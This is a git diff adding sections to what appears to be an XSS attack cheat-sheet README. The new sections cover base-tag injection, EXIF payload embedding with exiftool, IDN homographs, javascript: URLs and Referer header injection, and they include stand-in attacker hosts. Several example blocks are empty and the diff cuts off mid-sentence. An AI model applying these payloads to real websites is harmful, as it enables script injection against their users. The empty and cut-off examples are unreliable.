diff --git a/README.md b/README.md
index 5f9168a..ccb8360 100644
--- a/README.md
+++ b/README.md
@@ -573,8 +573,107 @@ Injecting malicious content into iframe sources can lead to XSS.
http://example.com/page.php?page=http://malicious.com
```
+Injecting Base Tags
+If script tags and event handler attributes are blogged you can try to leverage base tags for XSS
+```
+//lets say the site has a script tag like this
+
+//the attacker could inject
+
+//and host their own static/js/context.js. note: the injection point must be above the targetted script
+```
+Exploiting SQL errors
+if you see SQL errors, they are often not sanitized. This means they are worth checking for reflected xss. This doesn't only apply to SQL specifically but its the context I've seen this most
+
+Exif Data Injection to XSS
+Inject XSS Payloads into Exif data if the form is not sanitized properly
+Use a tool like ExifTool to embed a JavaScript payload in the EXIF metadata of an image.
+```
+exiftool -Title='' image.jpg
+```
+
+(IDN) Homograph Attack
+IDN allows the use of Unicode characters in domain names. Attackers can register domains that look visually similar to trusted domains by using characters from different languages that look alike. These domains can then host malicious content.
+
+
+
Exploiting WebAssembly
WebAssembly (Wasm) code that includes user input can be manipulated to execute malicious scripts.
```
WebAssembly.instantiateStreaming(fetch('module.wasm'), { env: { userInput: user_input } });
```
+JavaScript URL Injection
+If an application uses URLs with the javascript: scheme in places where it accepts input, this can lead to XSS.
+```
+javascript:alert('XSS via JavaScript URL')
+```
+
+Referer Header Injection
+If an application reflects the Referer header without sanitization, it can lead to XSS.
+```
+Referer: https://attacker-site.com/
+```
+
+SVG Use Element Injection
+The